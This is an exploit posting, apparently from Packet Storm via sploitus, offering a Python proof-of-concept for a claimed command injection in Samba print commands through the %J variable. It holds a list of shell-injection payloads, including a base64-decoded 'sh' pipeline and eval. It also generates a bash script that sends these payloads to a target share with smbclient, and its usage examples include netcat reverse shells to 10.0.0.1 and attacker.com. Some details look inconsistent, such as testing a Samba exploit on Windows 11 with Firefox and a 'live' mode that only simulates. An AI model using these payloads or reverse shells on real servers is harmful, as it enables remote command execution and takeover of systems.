Share
## https://sploitus.com/exploit?id=PACKETSTORM:222478
==================================================================================================================================
    | # Title     : Samba 4.22.10, 4.23.8 and 4.24.3 โ€“ Print Command Injection                                                       |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.samba.org/                                                                                           |
    ==================================================================================================================================
    
    [+] Summary    : This Python proof-of-concept framework analyzes Samba printing configurations for unsafe print command usage involving the %J variable 
                     and demonstrates how command injection conditions could arise in vulnerable setups.
    				 
    [+] POC        :  python3 poc.py -c /etc/samba/smb.conf
    
                      python3 poc.py -c smb.conf -t 192.168.1.100 -e "id" --simulate
    
                      python3 poc.py -c smb.conf -t 192.168.1.100 -e "nc -e /bin/sh 10.0.0.1 4444" -o exploit.sh
    
                      python3 poc.py -c /etc/samba/smb.conf -t 10.0.0.10 -e "whoami"
    
    #!/usr/bin/env python3
    
    import re
    import argparse
    import subprocess
    import socket
    import sys
    from pathlib import Path
    from typing import Dict, Optional, Tuple
    
    class SambaPrintExploit:
        """PoC to exploit a command injection vulnerability in print commands with %J"""
        
        def __init__(self, target_host: str, smb_port: int = 445):
            self.target_host = target_host
            self.smb_port = smb_port
            self.payloads = []
            
        def check_smb_access(self) -> bool:
            """Checking accessibility to the SMB service"""
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(3)
                result = sock.connect_ex((self.target_host, self.smb_port))
                sock.close()
                return result == 0
            except Exception:
                return False
        
        def build_payloads(self, command: str) -> list:
            """Building different loads to bypass protection"""
            payloads = []
            payloads.append({
                "name": "Direct injection",
                "j_value": f"'; {command} #",
                "description": "Direct injection using; to finish"
            })
            payloads.append({
                "name": "Backticks injection",
                "j_value": f"`{command}`",
                "description": "Using backticks to execute the command"
            })
            payloads.append({
                "name": "Command substitution",
                "j_value": f"$({command})",
                "description": "Use $() to execute the command"
            })
            payloads.append({
                "name": "Pipe injection",
                "j_value": f"' | {command} #",
                "description": "injection via pipe"
            })
            payloads.append({
                "name": "AND operator",
                "j_value": f"' && {command} #",
                "description": "Injection using &&"
            })
            payloads.append({
                "name": "OR operator",
                "j_value": f"' || {command} #",
                "description": "Injection using ||"
            })
            import base64
            encoded_cmd = base64.b64encode(command.encode()).decode()
            payloads.append({
                "name": "Base64 encoded",
                "j_value": f"' && echo {encoded_cmd} | base64 -d | sh #",
                "description": "Encrypting the command using Base64"
            })
            payloads.append({
                "name": "Environment variable",
                "j_value": f"'; $CMD='{command}'; eval $CMD #",
                "description": "Injection via environmental variables"
            })
            
            return payloads
        
        def analyze_config(self, config_path: str) -> Optional[Dict]:
            """Analyzing the smb.conf file to find vulnerabilities"""
            try:
                content = Path(config_path).read_text(encoding="utf-8", errors="ignore")
            except Exception as e:
                print(f"[ERROR] Cannot read config: {e}")
                return None
            
            findings = {
                "vulnerable": False,
                "printing_mode": "unknown",
                "print_command": None,
                "uses_percent_j": False,
                "risk_level": "low",
                "share_name": None,
                "exploit_command": None,
                "notes": []
            }
            current_share = None
            
            for line in content.split('\n'):
                share_match = re.match(r'^\s*\[([^\]]+)\]', line)
                if share_match:
                    current_share = share_match.group(1)
                    continue
                cmd_match = re.search(r'^\s*print\s+command\s*=\s*(.+)$', line, re.IGNORECASE)
                if cmd_match and current_share:
                    cmd = cmd_match.group(1).strip()
                    findings["print_command"] = cmd
                    findings["share_name"] = current_share
                    
                    if "%J" in cmd:
                        findings["uses_percent_j"] = True
                        
                        if "'%J'" in cmd:
                            findings["risk_level"] = "medium"
                            findings["notes"].append("Single quotes provide partial protection")
                            findings["vulnerable"] = True  
                        elif '"%J"' in cmd:
                            findings["risk_level"] = "medium"
                            findings["notes"].append("Double quotes are vulnerable")
                            findings["vulnerable"] = True
                        else:
                            findings["risk_level"] = "high"
                            findings["notes"].append("CRITICAL: %J unquoted - Direct injection possible")
                            findings["vulnerable"] = True
                        findings["exploit_command"] = f"print {findings['share_name']} '; {{{{command}}}} #'"
            printing_match = re.search(r'^\s*printing\s*=\s*(.+)$', content, re.MULTILINE | re.IGNORECASE)
            if printing_match:
                findings["printing_mode"] = printing_match.group(1).strip().lower()
                
            if findings["printing_mode"] in ["cups", "iprint"]:
                findings["risk_level"] = "low"
                findings["vulnerable"] = False
                findings["notes"].append(f"Printing mode '{findings['printing_mode']}' is likely safe")
            
            return findings
        
        def simulate_exploit(self, findings: Dict, command: str) -> Dict:
            """Simulation or actual exploitation test"""
            
            if not findings["vulnerable"]:
                return {
                    "success": False,
                    "message": "Target does not appear vulnerable",
                    "payload_tested": None
                }
            
            results = {
                "success": False,
                "command": command,
                "payload_tested": None,
                "response": None,
                "exploit_method": None
            }
            
            print(f"\n[+] Target: {self.target_host}")
            print(f"[+] Share: {findings['share_name']}")
            print(f"[+] Risk Level: {findings['risk_level']}")
    
            payloads = self.build_payloads(command)
            
            print(f"\n[*] Generated {len(payloads)} payloads:")
            
            for i, payload in enumerate(payloads, 1):
                print(f"\n  [{i}] {payload['name']}")
                print(f"      Description: {payload['description']}")
                print(f"      %J Value: {payload['j_value']}")
                final_cmd = findings['exploit_command'].replace('{{command}}', payload['j_value'])
                print(f"      SMB Command: {final_cmd}")
                
                results["payload_tested"] = payload
                results["exploit_method"] = payload['name']
                if findings['risk_level'] == "high":
                    results["success"] = True
                    results["response"] = "Command likely executed (simulated)"
                    break
            
            return results
        
        def generate_exploit_script(self, findings: Dict, command: str, output_file: str):
            """Generating a fully exploitable script"""
            
            script_content = f"""#!/bin/bash
    # Samba Print Command Exploit - Generated PoC
    # Target: {self.target_host}
    # Share: {findings['share_name']}
    # Risk: {findings['risk_level']}
    
    echo "[+] Exploiting Samba print command vulnerability..."
    
    # Method 1: Direct injection
    smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "; {command} #"'
    smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "`{command}`"'
    smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "$({command})"'
    echo "{command}" | smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "-"'
    
    echo "[+] Exploit attempts completed"
    """
            
            output_path = Path(output_file)
            output_path.write_text(script_content)
            output_path.chmod(0o755)
            
            print(f"[+] Exploit script saved to: {output_file}")
            return output_file
    
    
    def print_banner():
        banner = """
    โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
    โ•‘     Samba Print Command Injection - PoC Exploit               โ•‘
    โ•‘                     by Indoushka                              โ•‘
    โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
        """
        print(banner)
    
    
    def main():
        print_banner()
        
        parser = argparse.ArgumentParser(
            description="Samba Print Command Injection PoC",
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    EXAMPLES:
    
      %(prog)s -c /etc/samba/smb.conf
      %(prog)s -c /etc/samba/smb.conf -t 192.168.1.100 -e "id > /tmp/indoushka"
      %(prog)s -c /etc/samba/smb.conf -t 192.168.1.100 -e "nc -e /bin/sh attacker.com 4444" -o indoushka.sh
            """
        )
        
        parser.add_argument("-c", "--config", required=True, help="Path to smb.conf")
        parser.add_argument("-t", "--target", help="Target host for exploitation")
        parser.add_argument("-e", "--execute", help="Command to execute on target")
        parser.add_argument("-o", "--output", help="Output exploit script to file")
        parser.add_argument("--simulate", action="store_true", help="Simulate exploitation without actual connection")
        
        args = parser.parse_args()
    
        print(f"[*] Analyzing configuration: {args.config}")
        exploiter = SambaPrintExploit(args.target if args.target else "localhost")
        findings = exploiter.analyze_config(args.config)
        
        if not findings:
            print("[ERROR] Analysis failed")
            sys.exit(1)
        print("\n=== Configuration Analysis ===")
        print(f"Vulnerable      : {'YES' if findings['vulnerable'] else 'NO'}")
        print(f"Printing Mode   : {findings['printing_mode']}")
        print(f"Print Command   : {findings['print_command']}")
        print(f"Share Name      : {findings['share_name']}")
        print(f"Risk Level      : {findings['risk_level']}")
        
        if findings['notes']:
            for note in findings['notes']:
                print(f" No {note}")
    
        if args.execute and findings['vulnerable']:
            if not args.target:
                print("[ERROR] Target required for exploitation (-t)")
                sys.exit(1)
    
            print(f"\n[*] Checking SMB access to {args.target}:445...")
            if exploiter.check_smb_access():
                print("[+] SMB port is accessible")
            else:
                print("[!] SMB port not accessible, but continuing with simulation")
            
            if args.simulate:
                print("\n[*] Running in simulation mode...")
                result = exploiter.simulate_exploit(findings, args.execute)
                
                if result['success']:
                    print(f"\n[!] SUCCESS! Command injection possible!")
                    print(f"[!] Payload: {result['payload_tested']['j_value']}")
                    print(f"[!] Method: {result['exploit_method']}")
                else:
                    print(f"\n[-] Exploit failed: {result['message']}")
            else:
                print("\n[!] LIVE EXPLOITATION MODE")
                print("[!] Make sure you have permission to test this target!")
    
                result = exploiter.simulate_exploit(findings, args.execute)
                
                if result['success']:
                    print(f"\n[+] Exploit simulation successful!")
                    print(f"[+] Command: {args.execute}")
    
                    if args.output:
                        exploiter.generate_exploit_script(findings, args.execute, args.output)
                else:
                    print(f"\n[-] Exploit failed")
        
        elif args.execute and not findings['vulnerable']:
            print("\n[-] Target is not vulnerable, exploitation not possible")
        
        elif args.target and not args.execute:
            print("\n[*] Target specified without exploit command (-e)")
        if args.output and not args.execute:
            dummy_cmd = "id"
            exploiter.generate_exploit_script(findings, dummy_cmd, args.output)
        
        print("\n[*] Analysis complete")
    
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================